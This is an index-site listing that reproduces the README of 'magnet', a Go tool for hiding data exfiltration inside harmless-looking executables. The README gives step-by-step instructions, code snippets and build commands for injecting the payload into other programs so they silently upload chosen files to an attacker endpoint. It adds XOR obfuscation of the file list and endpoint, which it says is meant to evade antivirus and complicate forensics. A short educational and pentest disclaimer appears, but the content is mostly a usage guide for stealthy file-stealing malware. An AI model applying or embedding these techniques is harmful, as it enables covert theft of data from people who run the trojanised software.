Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/ariary/magnet

🧲 Hide data exfiltration in harmless looking executable
https://github.com/ariary/magnet

data-exfiltration encryption infosec malware pentest pentest-tool

Last synced: 2 months ago
JSON representation

🧲 Hide data exfiltration in harmless looking executable

Host: GitHub
URL: https://github.com/ariary/magnet
Owner: ariary
License: unlicense
Created: 2022-03-28T10:35:19.000Z (almost 3 years ago)
Default Branch: main
Last Pushed: 2023-10-23T07:18:28.000Z (over 1 year ago)
Last Synced: 2024-06-20T14:30:09.951Z (7 months ago)
Topics: data-exfiltration, encryption, infosec, malware, pentest, pentest-tool
Language: Go
Homepage:
Size: 162 KB
Stars: 4
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

magnet

🧲⚡
Grab interesting files from target

Cross-platform
Stealth
Portable

The library is built to fetch predefined files of interest from a remote device. It assumes that an HTTP endpoint is listening when the program is launched.

**Program execution on target will stealthy provide you the files you ask for.**

You have 2 possibilities:
* [Hide exfiltration in your program](#-inject-magnet-in-your-go-program)
* [Use the standalone `magnet` executable](#-standalone)

^{For educational purpose only or during pentest assessment with prior permission}

## Usage

All the work is made **At compilation time**, you need to specify:
* The ***remote endpoint***, where juicy files are uploaded
* The ***Juicy files***, list of files you want to grab
* The ***target os***, to fit the target (between: `windows`, `darwin`, `linux`)
* The ***method*** uses for exfiltration (`http`, `tcp`)
```shell
export KEY=[YOUR_KEY]
export FILES=[FILENAME]
export ENDPOINT=[ATTACKER_ENDPOINT]
export METHOD=[EXFILTRATION_METHOD]
```

### 🥷 Inject `magnet` in your Go program

1. Add `magnet` import and declare variables outside your `main()` function:
```golang
import "github.com/ariary/magnet/pkg/magnet"

var FileList,Key,Endpoint,Method string
```

2. Add magnet payload in the `main()`:
```golang
sender := magnet.InitMagnetSender(Method)
magnet.Magnet(sender, FileList, Endpoint, Key, debug)
```

3. Finally, modify the build command by adding `-ldflags "-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'"` and `CGO_ENABLED=0`

see [declare `magnet`environment variables](#declare-magnet-envar)

### ⚡ Standalone

To build `magnet` binary in one step:
```shell
# ensure lobfuscator is in your PATH
./build.sh $FILES $ENDPOINT $KEY $METHOD
```

See [`lobfuscator`](#build-lobfuscator) and [full example](https://github.com/ariary/magnet/blob/main/examples/EXAMPLES.md)

### Obfuscation/Encryption

To avoid detection systems, as we are seeking for sensitive files, **the different files we want to grab must not be in clear text within the binary** . Hence it used basic encryption with the key to decrypt embedded in binary. *(The aim is only to avoid AV and Detection system not to have strong encryption scheme)*

The same thing is made for the remote endpoints, to make the forensic analysis harder.

`lobfuscator` is the simple tool to perform the XOR encryption/decryption.

An exemple to build the obfuscated list:
```shell
cat [FILE] | lobfuscator $KEY > obfuscated.txt
# decrypt: cat obfuscated.txt | lobfuscator -d $KEY
```

#### Build `lobfuscator`
```shell
make build.lobfuscator
```

#### Declare `magnet` envar

Define `FILES` and `ENDPOINT` envar:
```shell
export FILES=$(cat [FILE] | lobfuscator $KEY)
export ENDPOINT=$(echo "[ENDPOINT]" | lobfuscator $KEY)
```

#### Go further

You can also use `lobfuscator` without providing a key to encrypt (will generate a random key of the size of the input):
```shell
# Encrypt with random key
cat samples/linux_juicy_files.txt | ./lobfuscator > encrypted.txt 2>tmp.txt && cat tmp.txt | cut -d ":" -f 2- > keys.txt && rm tmp.txt
# Decrypt using file containing keys
cat encrypted.txt| ./lobfuscator -d -kf keys.txt
```
## Notes

* For the remote endpoint , I suggest you to use the `/push` endpoint of a [`gitar`](https://github.com/ariary/gitar) listener
* The software is built to be stealthy hence:
* error handling is not verbose (hidden flag to get more verbosity `-thisisdebug`)
* I suggest to overwrite usage string in `magnet.go` to fit your attack scenario (for standalone use)
* To enhance the binary obfuscation use [`garble`](https://github.com/burrowers/garble) to compile `magnet` instead of `go`(adapt `build.sh` consequently)

## To do

* Handle directories
* Use other protocols to send files (ICMP, DNS, SMTP, etc...)
* `magnetgentool` is on the making, it will be used with `//go:generate` comment to stealthy inject magnet code.